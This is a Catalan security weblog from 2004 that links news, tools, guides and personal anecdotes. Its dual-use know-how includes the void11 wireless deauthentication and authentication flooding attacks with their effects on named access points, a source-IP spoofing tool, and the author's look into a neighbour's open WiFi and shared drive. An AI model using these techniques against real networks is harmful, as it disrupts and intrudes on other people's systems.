|
Weblog d'en Xavi Caballé
 |
dilluns, 31 / maig / 2004 |
[New York Times] Gaps seen in 'virtual border' security system L'actual administració dels Estats Units ha invertit milions de dòlars en un sistema informàtic per recollir informació biomètrica dels estrangers que passen pels controls d'immigració de les fronteres, amb l'objectiu de «detectar terroristes»... Però alguns investigadors de seguretat són escèptics sobre la seva viabilitat:
Computer scientists and security experts said that the problem facing border officials was in many ways similar to some of those faced by designers of antiballistic missile defenses. Despite decades of development work, antimissile systems cannot reliably detect and home in on enemy missiles that may be hidden in clouds of decoys.
Similarly, border control systems might detect individuals who appear in law enforcement or intelligence databases but provide little protection against attackers not yet known to the government.
|
21:50 (# Enllaç permanent) ()
|
|
[La Vanguardia] El lujo de leer en catalán (Requereix subscripció), sobre la diferència de preu entre les versions en català i en castellà d'un mateix llibre. Gairebé sempre és més barat llegir en castellà.
|
18:23 (# Enllaç permanent) ()
|
|
 Ahir em van portar cireres collides a l'hort que alguns familiars meus tenen a Ullastrell, un poblet del Vallès Occidental, al costat de Terrassa, amb poc més de 1.300 habitants.
El meu pare va néixer a Ullastrell i allà encara hi tinc molta família (i alguns lectors d'aquest weblog...).
Ullastrell està en mig de la Serralada de Ca n'Amat, un nom molt generós per un grupet de turons amb una altituds que amb prou feines arriben als 350 metres sobre el nivell de mar... però com deia Pere Quart, «en ma terra del Vallès / tres turons fan una serra / quatre pins fan un bosc espès, / cinc quarteres massa terra. / Com el Vallès no hi ha res.»
Doncs al que anava... aquestes cireres no tenen ni punt de comparació amb cap altra de les que es troben a les tendes. De fet, dubto que allò que es pot comprar a les tendes de fruita es pugui arribar a qualificar ni tan sols com cireres.
No he tastat mai les cireres de Sant Climent de Llobregat, que són les més anomenades... però dubto que puguin ser tan bones com aquestes. Són d'un color molt intens i d'un sabor que dura força estona... i vigileu que no taquin la roba, ja que les taques costen de treure. Recordo que quan era més petit de vegades anava a collir cireres a l'arbre... mal negoci pels meus oncles: em menjava més que no pas ficava dins el cistell. :-)
|
17:41 (# Enllaç permanent) ()
|
|
 Des de fa vàries setmanes, a la porta del carrer de casa tinc col·locat aquest adhesiu per indicar que no vull rebre publicitat comercial. L'adhesiu el vaig sol·licitar a través de la web de l'Ajuntament de Terrassa (per cert, vaig fer la sol·licitud dues vegades i com no van contestar a cap de les dues peticions, vaig haver d'enviar un missatge preguntant si rebien les peticions... és a dir, l'Ajuntament de Terrassa en aquest sentit fa com la resta d'administracions locals, tal com explicaven fa alguns dies a «La Malla»: ignorar les peticions rebudes per Internet).
Segons la normativa municipal de Terrassa, tinc el dret a indicar que no vull rebre publicitat directa (entenent com a tal qualsevol mena de publicitat on no figuri el nom i l'adreça del destinatari), mitjançant aquest adhesiu que facilitat gratuïtament l'ajuntament a tothom que ho demani. La responsabilitat per l'incompliment d'aquesta normativa recau en les empreses o entitats que fan la distribució i en la persona física o jurídica anunciada. A més, des de fa uns dies el tràmit per presentar la queixa per l'incompliment d'aquesta normativa també es pot fer a través d'Internet.
Des de que he posat l'adhesiu (relativament petit, tot s'ha de dir) la publicitat que rebo a casa s'ha reduït notablement. Hi ha moltes empreses que incompleixen la normativa (entre d'altres, el propi Ajuntament de Terrassa), però ja no arriba als nivells de fa un temps. Abans quan arribava al vespre a casa no era estrany trobar cinc o sis fulletons de publicitat al terra... ara gairebé tots els dies no en trobo ni un.
Personalment trobo la difusió d'aquesta mena de publicitat tant molesta com el correu brossa que rebo a la meva bústia de correu electrònic. A més, sovint alguns dels anuncis que hi ha (els de les excursions amb demostració comercial) no deixen de ser tapadores per autèntiques estafes. D'altres fulletons, en canvi, si que són útils... però puc viure totalment sense aquesta mena de publicitat.
|
17:17 (# Enllaç permanent) ()
|
|
[Eines] Accelerant l'OpenOffice.org
Els usuaris de l'Openoffice haurem notat la seva lentitud al carregar-se, fins i tot en màquines molt potents. Doncs bé, s'ha descobert un petit truc que accelera la càrrega i fins i tot el treball dintre de l'Openoffice. Són cinc passes a seguir molt senzilles
|
14:04 (# Enllaç permanent) ()
|
|
|
diumenge, 30 / maig / 2004 |
Sembla que la web de Microsoft va ser víctima d'un atac que va aconseguir modificar-ne l'aspecte d'una pàgina:
En parlen a ArsTechnica.com i a The Inquirer. No ho he pogut confirmar... així que només ho indico com un rumor.
|
23:43 (# Enllaç permanent) ()
|
|
Window Managers for X és una web on es comparen els diversos entorns gràfics i d'escriptori disponibles per a l'entorn X Window: FVWM, AfterStep, AMIwm, vtwm, FVWM95, Sawfish, Metacity, scwm, windowmaker, blackbox, icewm, enlightenment, MWM, vm2, OLVMW, Flubox, CTWM, GNome, KDE, CDE, XFCE... i molts altres
|
23:34 (# Enllaç permanent) ()
|
|
[ONLamp.com] Network Your Shell Scripts with Netpipes. Interessant article on es mostra com fer servir les utilitats incloses al paquet netpipes dins d'scripts del shell per a transferir informació.
netpipes is a suite of utilities for shell-script writers that builds on the idea of conventional pipes to allow different processes to communicate and share data using both TCP and Unix domain-based sockets across the network! Not only does it duplicate the pipe's behavior, but it uses a novel technique called Session Control Protocol (SCP) that provides a simple mechanism for creating multiple, lightweight connections over a single TCP session connection. You can have many datastreams at the same time instead of just one.
|
18:49 (# Enllaç permanent) ()
|
|
[ONLamp.com] Entrevista a Paul Graham
Paul Graham is a hacker, a painter, and an essayist known as much for his thoughtful writings on spam, hacking, and Lisp as for creating the Arc programming language. His new book, Hackers & Painters, contains many of his popular essays as well as several new ones. Paul graciously agreed to an interview with the O'Reilly Network about his work.
|
18:39 (# Enllaç permanent) ()
|
|
LiveHTTPHeaders és una extensió prou interessant per a Firefox. Permet veure les capçaleres de la negociació HTTP entre el client i el servidor, la qual cosa pot ser força útil per d'analitzar la seguretat de les aplicacions web. No arriba a ser una eina de l'estil de WebProxy, ja que no permet modificar les capçaleres, però si és útil per tenir-lo sempre a mà.
Un avís: l'he provat sota Windows i si s'activa l'opció de fer servir fulls d'estil (com en aquesta captura de pantalla)... es menja pràcticament tots els recursos de la CPU.
|
16:35 (# Enllaç permanent) ()
|
|
|
dissabte, 29 / maig / 2004 |
[TechNewsWorld] Viruses on Rise, But Are Companies Liable?
Computer viruses designed to steal victims' personal and financial information -- names, addresses, and credit card numbers -- are becoming increasingly widespread on the Internet, according to an Internet-security trends report by security software maker Symantec Corp. Unfortunately, companies are trying to limit their liability when such online security breaches hijack customer data
|
17:41 (# Enllaç permanent) ()
|
|
[Newsfactor] Microsoft To Spend $300 Million on Mega Patch
Microsoft is issuing a mega patch for Windows XP -- its much-anticipated XP Service Pack 2. The company says the critical update represents a $300 million investment in better security. In addition to being available for download at the Microsoft Web site, XP SP2 will ship with all new PCs.
|
17:39 (# Enllaç permanent) ()
|
|
|
divendres, 28 / maig / 2004 |
Hacking with Ramzi (Windows Media, 2.67 MB) Una classe de com ser un hacker... en aquest cas, com baixar software amb el Kazaa... per partir-se el pit!
|
23:44 (# Enllaç permanent) ()
|
|
Honeynet Security Console 1.0, una eina d'anàlisi i centralització dels esdeveniments produïts dins d'una xarxa de honeypots. Permet recollir els esdeveniments generats per Snort, TCPDump, el tallafocs, Syslog, Sebek... i correlacionar-los. Aquesta consola es pot executar a Windows XP i Windows 2000.
|
23:02 (# Enllaç permanent) ()
|
|
[News.com] First known 64-bit virus threat found. El primer virus per a la versió de 64-bit de Windows:
Security technology company Symantec reported Thursday that it has analyzed what it believes to be the first known threat to 64-bit Windows systems, a virus labeled W64.Rugrat.3344.
Més informació a la web de Symantec:
W64.Rugrat.3344 is a direct-action infector--it exits memory after execution--of IA64 Windows Portable Executable (PE) files. These PE files include most 64-bit Windows programs other than .dlls.
The virus infects files that are in the same folder as the virus and in all subfolders. It is the first known virus for 64-bit Windows, and it uses the Thread Local Storage structures to execute the viral code. This is an unusual method of executing code.
|
22:51 (# Enllaç permanent) ()
|
|
El Cafè Caracas de la Ronda de Sant Antoni avui celebra el seu 50è aniversari... i ho celebra oferint els cafès (sol, tallat i amb llet) a un preu simbòlic: 1 cèntim d'euro...
|
15:42 (# Enllaç permanent) ()
|
|
|
dijous, 27 / maig / 2004 |
 Genial... un cartellet per posar a la porta per fer saber a tothom que, enlloc s'està com a 127.0.01 (com a casa!).
Si el voleu comprar, a Thinkgeek.
|
23:31 (# Enllaç permanent) ()
|
|
Com conseqüència del canvi de feina, a partir d'ara tinc un nou número de telèfon. Si no heu rebut un SMS o un email amb el nou número, aviseu-me...
|
23:24 (# Enllaç permanent) ()
|
|
Microsoft ha publicat una interessant eina pels programadors que els permet generar automàticament documents de models d'amenaces per als seus programes.
It organizes relevant data points, such as entry points, assets, trust levels, data flow diagrams, threats, threat trees, and vulnerabilities into an easy-to-use tree-based view. The tool saves the document as XML, and will export to HTML and MHT using the included XSLTs, or a custom transform supplied by the user.
|
23:08 (# Enllaç permanent) ()
|
|
|
dimecres, 26 / maig / 2004 |
 Sembla que està circulant un nou cuc a través de l'IRC i de FTP i que s'aprofita de vulnerabilitats de Windows (per les quals ja fa temps hi ha actualització).
|
22:49 (# Enllaç permanent) ()
|
|
[ITweb] Microsoft announces new security software i aprofitar per entrar en un nou mercat: el de les «caixes negres» o appliances: combinació de hardware i software que es connecta directament a la xarxa i actua com a servidor de seguretat:
Microsoft said yesterday it would begin selling network security software pre-installed on computers, taking aim at a market dominated by appliance security vendors.
Microsoft said it is lining up hardware partners such as HP and Network Engines for its Internet Security and Acceleration (ISA) Server software, due to launch later this year.
Tot això amb una nova versió del tallafocs de Microsoft, ISA Server 2004, que està prevista alliberar a finals d'aquest any.
|
22:44 (# Enllaç permanent) ()
|
|
Fa uns dies vaig actualitzar l'Apache a la versió 1.3.31 i... vés per on, no vaig pensar en incloure el mod_gzip. Avui m'he adonat i he estat una bona estona recordant com carai s'instal·la un mòdul extern en una configuració estàtica d'Apache.
Així que m'ho apunto en aquest post per tenir-ho documentat:
- Descomprimir el codi font de mod_gzip en un directori temporal
- Crear el directori src/modules/gzip dins de l'estructura de directoris d'Apache
- Copiar dins d'aquest src/modules/gzip els fitxers *.c, *.h i *.tmpl del directori temporal on hem descomprimit el mod_gzip
- Executar el configure d'Apache passant-li com a paràmetre --activate-module=src/modules/gzip/mod_gzip.c
- configure crearà dins del directori src/modules/gzip un fitxer Makefile (el que s'inclou a la distribució de mod_gzip està pensat per a la compilació del mòdul dinàmic).
- Verificar que configure inclou aquest nou mòdul. Durant el procés ha de visualitzar aquestes dues línies:
* activated gzip module (modules/gzip/mod_gzip.c)
i Creating Makefile in src/modules/gzip
- Executar el make de forma estàndard.
- Si peta amb aquest error:
make[4]: *** No rule to make target
`libgzip.c', needed by `lib'. Stop
editar el fitxer Makefile.tmpl i substituir la línia LIB=libgzip.$(LIBEXT)
per LIB=libgzip.a
Pel que he vist, de vegades el configure no estableix el valor de la variable LIBEXT.
- Un cop acabada la compilació, es pot verificar que s'ha inclòs el mod_gzip de la següent forma:
cd src
./httpd -l
Compiled-in modules:
http_core.c
mod_env.c
...
mod_gzip.c
Si surt el mod_gzip.c vol dir que el mòdul s'ha inclòs correctament.
|
22:32 (# Enllaç permanent) ()
|
|
[El Periódico] Entrevista a Rosa Garcia, la consellera delegada de Microsoft Ibérica: «La seguretat és qüestió de tota la indústria»
¿Quina responsabilitat té Microsoft en les epidèmies de virus?
--La seguretat és una qüestió en la qual hem de treballar tota la indústria, però s'ha d'ensenyar als usuaris que no es creguin tot el que passa per les seves bústies. Nosaltres estem fent una tasca bastant seriosa intentant filtrar els nostres problemes. Les nostres alertes de seguretat són cada vegada menys i estem fent una tasca d'informació als directors de tecnologia, amb alarmes i esdeveniments. No estem contents de com està la situació, però es veu que anem en la bona direcció. De fet, Espanya ha sigut un dels països menys atacats pels últims virus. Si no ho féssim bé, això no seria així...
Personalment crec que «pixa fora de test» a gairebé totes les respostes...
|
15:27 (# Enllaç permanent) ()
|
|
Transcripció de l'entrevista que fa un parell de setmanes vam fer a Steven Bellovin (un resum de la qual es va publicar al Ciberpais de dijous passat).
Si sóc el fabricant d'un cotxe i la gent que el condueix pateix un accident per un error al cotxe, la legislació diu que jo en sóc el responsable. A la indústria del programari, si els clients d'un banc perden els seus estalvis per culpa d'un producte informàtic, el fabricant del mateix no té cap responsabilitat.
També a Hispasec (en dues parts).
|
00:43 (# Enllaç permanent) ()
|
|
|
dimarts, 25 / maig / 2004 |
Un missatge del Jesús Corrius on explica el problema de coexistència de Windows XP i Fedora Core 2, donant una possible solució temporal:
Hola a tots,
Sembla que hi pot haver problemes en instal·lar aquesta versió en un ordinador en dual-boot amb Windows 2000 o XP. Tal i com està documentat.
Fins que el problema no estigui del tot resolt, en el cas que vulgueu instal·lar la Fedora Core 2 en aquesta situació, podeu escriure el següent a la línia d'ordres a l'arrencada del CD d'instal·lació:
linux hda=2432,255,63
Salut!
|
23:12 (# Enllaç permanent) ()
|
|
[Microsoft] Security Wireless LANs with PEAP and Passwords és una guia de Microsoft on s'explica com les organitzacions mitjanes i petites poden protegir el seu punt d'accés d'una xarxa sense fils. La guia explica com planificar, dissenyar, verificar i gestionar les xarxes sense fils utilitzant Windows XP, Windows Server 2003 i Pocket PC 2003.
|
23:05 (# Enllaç permanent) ()
|
|
 Helix és una distribució de Linux, basada en Knoppix, pensada per executar-se directament des del CD. Dóna suport als nuclis 2.4.26 i 2.6.5. Està especialment dissenyada per a la realització d'anàlisis forenses i resposta a incidents informàtics. Helix en poc temps s'ha convertit en una distribució de referència. Per exemple, SANS Institute la fa servir en les seves sessions de formació sobre anàlisis forense.
|
21:33 (# Enllaç permanent) ()
|
|
A Hacking Linux Exposed han publicat una sèrie de sis articles sobre la utilització de PGP i GPG pel xifrat del correu i fitxers:
- 1 - Seguretat del correu i de fitxers.
- 2 - Creació de la clau privada i pública.
- 3 - Xifrant i desxifrant.
- 4 - Important i exportant claus.
- 5 - Verificant claus públiques.
- 6 - Signat claus públiques.
|
07:24 (# Enllaç permanent) ()
|
|
|
dilluns, 24 / maig / 2004 |
[Microsoft] Security Enhancements for Remote Access at Microsoft
Detailed discussion of how Microsoft IT significantly improved the security of its corporate network remote access solution using the latest generation of Microsoft products, such Windows XP Professional, Windows Server 2003, Internet Authentication Service, SQL Server 2000, and Connection Manager. The solution deployed, called Secure Remote User (SRU), enabled Microsoft IT to manage specific remote desktop configurations, ensuring that all established security requirements are met when remote users access corporate network resources. SRU contributes to reducing the external attack surface of the Microsoft corporate network, thereby better protecting its intellectual property.
|
23:08 (# Enllaç permanent) ()
|
|
|
diumenge, 23 / maig / 2004 |
 Aquesta guia pretén mostrar els reptes que suposa l'existència dels ordinadors de butxaca i/o assistents personals dins dels entorns de xarxes corporatives.
En aquest llibre es fa una anàlisi de les amenaces que suposa l'existència dels PDA, els requeriments que ha d'incloure la política de seguretat corporativa en relació als mateixos i, finalment, quines consideracions cal tenir en la configuració d'aquests dispositius.
Segurament l'existència dels PDA encara avui en dia no s'ha valorat els factors de risc de l'existència d'informació dins d'assistents personals. Avui en dia ningú considera acceptable tenir informació sensible dins d'un servidor o un ordinador portàtil sense aplicar cap mesura de protecció... i justament això és el que tenim dins dels PDA. Sovint als assistents podem trobar informació com fulls de càlcul, base de dades, documents, agendes telefòniques, dades sensibles... amb cap mena de protecció d'accés. O fins i tot pitjor: de vegades hi ha mesures de control d'accés... encara que sovint és un joc de nens saltar-se-les.
Aquest llibre és de força interès per a tots aquells professionals de la seguretat, tant els administradors de la seguretat com els consultors, amb responsabilitat en el desenvolupament d'una política de seguretat que inclogui referències a la utilització de PDA d'una forma segura i les consideracions a tenir en compte alhora de transferir informació dins d'un assistent personal.
Titol: PDA Security. Incorporating Handhelds into the Enterprise
Autor: David Melnick
Editorial McGraw-Hill
1a edició, juliol 2003
378 pàgines
ISBN 0-007142-490-3
El llibre a Amazon.com i a Amazon.co.uk.
|
21:44 (# Enllaç permanent) ()
|
|
 M'acabo d'assabentar pel Telenotícies de TV3 de la mort de Ramon Margalef, catedràtic emèrit d'ecologia de la Universitat de Barcelona.
Ramon Margalef va ser el gran introductor de l'estudi de l'ecologia com a ciència: l'estudi de les relacions entre els diversos éssers vius. També va destacar pels seus estudis de limnologia, l'estudi dels ecosistemes dels llacs i zones humides.
A més, Ramon Margalef va destacar com un gran divulgador de les ciències de la vida (i la ciència en general).
|
20:39 (# Enllaç permanent) ()
|
|
[Help New Security] Centralizing the Management of Network Security
Implementing an effective and centralized “cradle to grave” security policy includes a three phased plan for centralized control and decentralized execution:
Initial Rollout: Deploying operating systems and applications (including security solutions, such as virus protection), re-provisioning systems (i.e. using the same PC for a different purpose). By making security an integral part of the deployment process, you will have secure systems from the start. Adding security to systems management later is like purchasing auto insurance after your first car accident.
Ongoing Security Maintenance: Updating machines with security patches on a continuous basis. If security is already tied in with systems management, this is an easy and integrated process. Not keeping your systems updated would be akin to thinking that because your car passed its safety inspection two years ago, you will never experience car problems again.
Displacement: Permanently erasing all data from the hard drive, so the machine can leave company premises without any 3rd party being able to extract confidential data from it.
|
19:42 (# Enllaç permanent) ()
|
|
[Slashdot] Fedora Core Doesn't Like to Dual Boot? comenta els problemes de tenir Fedora Core Linux 2 en la mateixa màquina amb Windows 2000 i Windows XP. Pel que sembla Fedora Core es carrega el mapa de particions i no permet tornar a iniciar Windows.
|
19:33 (# Enllaç permanent) ()
|
|
[Via Atalaya] Avui en dia, qualsevol error o incidència s'atribueix als virus informàtics:
Ideal Digital
(també a Diario de Cádiz i Granada Digital)
"Un virus informático introduce datos erróneos en 7.000 recibos del IBI y obliga a reenviarlos"
La infiltración de un virus informático en uno de los ficheros correspondientes al Impuesto de Bienes Inmuebles (IBI), ha supuesto el envío a 7.000 granadinos de recibos con datos erróneos en la cuantía a pagar, así como en el plazo de recaudación
(...)
«Nada más y nada menos que siete billones de euros»
(...)
Una cuantía tan extraordinaria e inaccesible como la fecha de plazo voluntaria de pago que aparecía impresa: diciembre de 1899
Un virus o un simple error informàtic? Dir que ha estat un virus evita reconèixer una simple pífia i així no haver d'assumir les possibles responsabilitats?
|
12:37 (# Enllaç permanent) ()
|
|
[Mac Devcenter] The Fight Against Spam. Sèrie de tres articles (1, 2 i 3) amb consells i eines per la lluita contra el correu brossa. Orientat als usuaris de Mac OS X.
|
12:27 (# Enllaç permanent) ()
|
|
[Infosec Writers] Wireless Infidelity fa un repàs de la situació de segurtetat de les comunicacions sense fil en el passat i quines són les perspectives de futur.
So while the past of Wi-Fi has been plagued with security problems the economics are such that many players in the IT market want to see the insecure WEP replaced with something more robust. While nothing in the future is certain, it seem a given that Wi-Fi will overcome its adolescent growing pains and mature into a reasonably secure and easy to deploy method of networking.
|
11:58 (# Enllaç permanent) ()
|
|
|
dissabte, 22 / maig / 2004 |
Tinc un veí (encara no se ben bé qui és) que s'ha instal·lat recentment una connexió WiFi i la té totalment oberta... no fa servir cap mena de xifrat ni restricció en la connexió. La IP correspon a una línia ADSL de Telefonica. A més, el SSID és Wireless que ja he vist en algun altre lloc en situacions prou semblants.
És possible que algun ISP estigui comercialitzant línies ADSL amb accés WiFi i els deixi totalment oberts, sense cap mena de restricció en la connexió?
 Per cert... acabo de veure que la màquina del veí és un Windows 98 amb el disc dur compartit... i la impressora. Que trist... Estic per imprimir-li una pàgina dient-li que té un problema.
|
22:15 (# Enllaç permanent) ()
|
|
[eWeek] Blogging Technology Going Open Source. El motor utilitzat per Radio Userland (l'eina que faig servir pel manteniment d'aquest weblog) es convertirà en els propers mesos en codi obert:
On Monday, the founder of UserLand Software Inc. said an open-source release of the Frontier platform, which serves as the underlying engine and runtime for the Manila and Radio UserLand blog-publishing tools, would become available within the next few months.
|
13:09 (# Enllaç permanent) ()
|
|
[Wired] Embracing the Art of Hacking
The idea that every hacker is an artist and every artist is a hacker isn't groundbreaking -- recent gallery and museum shows have focused on the link between art and coding -- but a new book by programmer Paul Graham gives the concept a fresh twist by advising hackers to improve their skills by borrowing creative techniques from other artists.
Billed as a guide into the minds and motivations of hackers, Hackers & Painters, due to be released by O'Reilly Media later this month, is a mixed bag of essays on topics ranging from aesthetics to high school hazing, spam to startups, Microsoft to money.
|
13:04 (# Enllaç permanent) ()
|
|
The Antivirus Defense-in-Depth Guide és una publicació de Microsoft on s'expliquen les diverses varietats de malware que hi ha actualment, indicant els seus riscos, les característiques, els mecanismes de replicació i la forma d'actuar.
A la guia també s'indiquen consideracions per a la implementació d'una completa defensa contra als virus a nivell de xarxa, servidors i estacions de treball, molt més enllà de la simple instal·lació d'antivirus. Finalment es presenta una metodologia per a la resposta efectiva davant les incidències originades per l'entrada d'un element de malware.
|
10:48 (# Enllaç permanent) ()
|
|
Dave's UNIX/Solaris Tips Page recull un bon nombre de trucs i consells per als diferents Unix del mercat: Solaris, Tru64, HP-UX, AIX... així com d'altres coses sovint relacionades (DNS, xarxes Cisco, cablejat, clústers)...
A través dels enllaços d'aquest web he trobat un article força interessant: Cool Commands, un recull de funcions poc conegudes de Solaris i que són força interessants.
|
10:41 (# Enllaç permanent) ()
|
|
|
divendres, 21 / maig / 2004 |
[Information Week] Phishing Expeditions Are Multiplying. En el que portem d'any els intents de robatori de la identitat (Phishing) han augmentat un 500%.
Aquesta mena d'atacs consisteixen en utilitzar algun sistema (habitualment el correu electrònic) per tal de convèncer als usuaris d'un sistema (com poden ser la banca online) per tal que facilitin les seves dades d'accés als atacants. La forma més habitual consisteix en adreçar a l'usuari a una web sota el control de l'atacant que simula el servei legítim, sovint fins al més petit dels detalls inclosa la URL.
|
22:40 (# Enllaç permanent) ()
|
|
[ONLamp.com] Mail-Filtering Techniques explica diverses tècniques per a filtrar el correu electrònic per tal d'eliminar els cucs, el correu brossa i els atacs DoS d'inundació de correu.
|
22:16 (# Enllaç permanent) ()
|
|
 Auditor és una distribució de Linux («Live CD» o, recordant a l'Stallman, un «Disco vivo») basada en Knoppix pensada per a ser utilitzada en auditories de seguretat i proves de penetració.
La llista d'eines incloses és impressionant i inclou tota mena d'aplicacions: clients dels diversos protocols, sniffers, proves de rendiment, generadors de paquets, analitzadors de xarxes sense fils, trencadors de claus, atacs de força bruta, etc...
|
20:41 (# Enllaç permanent) ()
|
|
|
dijous, 20 / maig / 2004 |
Sun ha publicat la tercera versió beta de Solaris 10, corresponent al mes de maig. Les novetats: millores al suport d'USB, millores a l'eina vacation (utilitat per a Sendmail que permet informar que no es pot atendre el correu), el controlador Common Solaris Target Disk, millores a DTrace, canvis al suport de Kerberos... Per a més detalls, consulteu el What's new o feu via i baixeu les imatges ISO dels CD.
|
23:01 (# Enllaç permanent) ()
|
|
[La Vanguardia] Coelho critica el precio de los diálogos
El Fòrum –se arrancó el mediático Coelho– es una maravilla. Por la cultura, la palabra, hay que pagar algo, pero 25 euros es muy caro. Me siento muy cortado porque mis lectores no han podido acudir por el precio
|
22:56 (# Enllaç permanent) ()
|
|
[Slashdot] 71% of Spam servers are located in China. Perdoneu la broma, però el 29% restant em penso que es troben a l'Argentina...
Segons s'indica al post de referència, enguany s'està notat un augment exponencial en el volum del correu brossa: des de l'1 de gener es calcula un increment entre un 30% i un 40%.
|
22:53 (# Enllaç permanent) ()
|
|
[News.com] Transmeta to add antivirus feature to chips explica que el fabricant de processadors Transmeta està estudiant la possibilitat d'incloure les funcions d'un antivirus dins de la circuiteria del processador. Aquest processador s'integraria dins de Windows XP (amb Service Pack 2 instal·lat).
|
22:44 (# Enllaç permanent) ()
|
|
[News.com] Microsoft to submit antispam standard. Microsoft proposarà que la seva tecnologia per a la lluita contra el correu brossa, bassada en la verificació de l'adreça del remitent realment correspon amb el remitent legítim, es converteixi en un estàndard oficial d'Internet.
The technology, called "Caller ID for E-mail," is an Internet Protocol-based method to ensure that the sender's return e-mail address is authentic. Many spammers have used a method called "spoofing," which makes their return addresses appear legitimate to the recipient's spam filters. Often, people open unwanted spam, thinking it originated from a contact, which could lead to the further dissemination of viruses and user annoyance.
|
22:42 (# Enllaç permanent) ()
|
|
 Avui he dinat a un restaurant vietnamita que hi ha a la Plaça Doctor Letamendi de Barcelona, el restaurant Hanoi.
És un restaurant amb menú diari (encara que segons m'han dit amb poca varietat) de 8,5 euros. Tres plats: el primer permet escollir entre una mena de rotlles primaveres i una amanida; el segon són una mena de bunyols al vapor; el tercer és més variat: ànec, pollastre, peix...
Especialment recomanable els postres: una poma al forn amb sucre de sèsam, que te'l preparen a la mateixa taula submergint-lo dins d'un bol amb aigua i glaçons...
|
22:27 (# Enllaç permanent) ()
|
|
Avui el suplement d'Internet del diari «El País», el Ciberpais, publica un article de la Mercè Molist on jo hi he col·laborat (gràcies Mercè per incloure el meu nom com autor!) amb un resum de l'entrevista que vam fer la setmana passada a l'Steven Bellovin.
Gràcies a un visitant d'aquest weblog, aquí teniu la versió PDF de l'article. És una versió «light» i reduïda de l'entrevista... en els propers dies tenim la intenció de publicar el text íntegre de la mateixa, que és molt interessant.
|
15:49 (# Enllaç permanent) ()
|
|
|
dimecres, 19 / maig / 2004 |
El Security Guidance Kit v1.0 (150 MB) de Microsoft és una col·lecció d'eines, documentació i guies detalles integrades dins d'una aplicació pensades per ajudar en la presa de decisions sobre la implementació de les mesures de seguretat a les plataformes Microsoft (Windows 2000, Windows XP i Windows Server 2003).
Entre els temes que es tracta s'inclouen la gestió de pegats, la lluita contra els virus informàtics, l'accés remot segur, el bloqueig de fitxers associats als missatges perillosos.
Els documents van adreçats als administradors de sistemes i de seguretat per a organitzacions d'una mida petita, mitjana o gran.
|
23:12 (# Enllaç permanent) ()
|
|
 O'Reilly ha presentat un espectacular pòster (PDF) amb la història dels llenguatges de programació, des de l'històric FORTRAN (any 1954), fins als més recents (Python, ActionScript, Java, PERL...
Si en voleu una còpia impresa, la podeu adquirir a O'Reilly adquirint dos llibres a la seva tenda online i indicant el codi de descompte OPC79.
Addicionalment, hi ha una Wiki per a indicar canvis o fer correccions al pòster.
|
23:01 (# Enllaç permanent) ()
|
|
Public Domain Software Library for AIX és una col·lecció de paquets dels diferents productes de software lliure i de codi obert, portats al sistema operatiu AIX d'IBM. Generalment la instal·lació és força simple: # zcat wget.1.9.1.tar.Z | (cd /; tar xvpf -)
x ./usr/local/bin/wget, 619059 bytes, 1210 media blocks.
x ./usr/local/info/wget.info, 2576 bytes, 6 media blocks.
x ./usr/local/info/wget.info-1, 45301 bytes, 89 media blocks.
x ./usr/local/info/wget.info-2, 50448 bytes, 99 media blocks.
x ./usr/local/info/wget.info-3, 44699 bytes, 88 media blocks.
x ./usr/local/info/wget.info-4, 30878 bytes, 61 media blocks.
x ./usr/local/man/man1/wget.1, 58351 bytes, 114 media blocks.
Fent això ja tenim /usr/local/bin/wget a la nostra disposició.
Una altra eina bàsica és l'OpenSSH, disponible a Darren Tucker's OpenSSH Page: gunzip -d openssh-3.8p1-bff.tar.gz
tar -xvf openssh-3.8p1-bff.tar
installp -a -X -d openssh-3.8p1.bff all
En acabar tenim /usr/local/bin/ssh i /usr/local/sbin/sshd a la nostra disposició.
|
22:36 (# Enllaç permanent) ()
|
|
[SecurityFocus] Anti-Spam Solutions and Security article en dues parts que tracta sobre els perills amagats dins del correu brossa i els mètodes existents per a lluitar, tant els basats en la utilització de pegats com suggeriments per canvis més radicals (per exemple, indica els possibles canvis a fer al protocol SMTP).
|
22:28 (# Enllaç permanent) ()
|
|
 Xxpoof, una petita eina per a Windows que permet generar paquets amb adreça IP d'origen falsificada. Podem generar qualsevol adreça indicant el seu origen i la destinació, l'interval entre l'emissió dels paquets i el nombre total de paquets a enviar.
|
21:46 (# Enllaç permanent) ()
|
|
 A hores d'ara ja no és cap novetat dir que ha sortit la versió final de Fedora Core 2... en aquests moments m'estic baixant la imatge ISO del DVD, però per la seva mida (i pel fet que ara no tinc accés a cap connexió especialment ràpida), trigaré uns quants dies...
Només destacar que aquesta versió de Fedora és la primera en incorporar la molt bona feina que ha fet (en relativament poc temps) un bon grup de gent a Softcatalà.
|
21:43 (# Enllaç permanent) ()
|
|
Després de quatre anys treballant en soterranis i edificis sense finestres ni il·luminació natural, aquesta vista no té preu...
|
15:41 (# Enllaç permanent) ()
|
|
|
dimarts, 18 / maig / 2004 |
void11, una «implementació lliure» d'alguns atacs bàsics a les xarxes 802.11b:
deauth (Network DOS) (flood wireless networks with deauthentication packets and spoofed BSSID; authenticated stations will drop their network connections)
auth (Accesspoint DOS) (flood accesspoints with authentication packets and random stations addresses; some accesspoints will deny any service after some flooding)
- Apple Airport aka "UFO" died after ~60sec flooding for about 15min.
- Lucent OR1000 survived with minor problems.
- OpenBSD 3.1/3.2 HostAP freezed after some flooding.
- Linux HostAP driver survived ;-) (max. 1023 authenticated stations).
I si volueu més detalls sobre l'atac DEAUTH, llegiu aquest document d'Aruba Networks.
|
23:17 (# Enllaç permanent) ()
|
|
El representant de BitDefender m'informa de la publicació, el passat 3 de maig, de la versió en català del programa antivirus BitDefender. Aquesta versió està disponible en versió d'avaluació, que es pot baixar directament des del lloc ftp del fabricant. A més, segons assenyala el mateix representant, també s'ofereix suport tècnic en català.
Felicitats per la iniciativa!
|
22:29 (# Enllaç permanent) ()
|
|
|
dilluns, 17 / maig / 2004 |
El NIST (l'organisme nord-americà responsable de la definició i cerificació dels estàndards) ha validat recentment la implementació de diversos algoritmes de xifrat inclosos a OpenSSL: AES, DES, TDEA, DSA i SHS.
|
23:35 (# Enllaç permanent) ()
|
|
Hardened-PHP adds security hardening features to PHP to protect your servers on the one hand against a number of well known problems in hastily written PHP scripts and on the other hand against potential unknown vulnerabilities within the engine itself.
Implemented protections (until now)
- Canary protection of the Zend Memory Manager
- Canary protection of Zend Linked Lists
- Protection against internal format string exploits
- Protection against arbitrary code inclusion
- Syslog logging of attackers IP
|
20:39 (# Enllaç permanent) ()
|
|
[Cryptonomicon] The 802.11b DoS Attack and Portable Viruses tracta d'explicar l'abast real de la vulnerabilitat descoberta al protocol 802.11 i que pot ser utilitzada per atacs de denegació de servei (veure l'article publicat ahir)
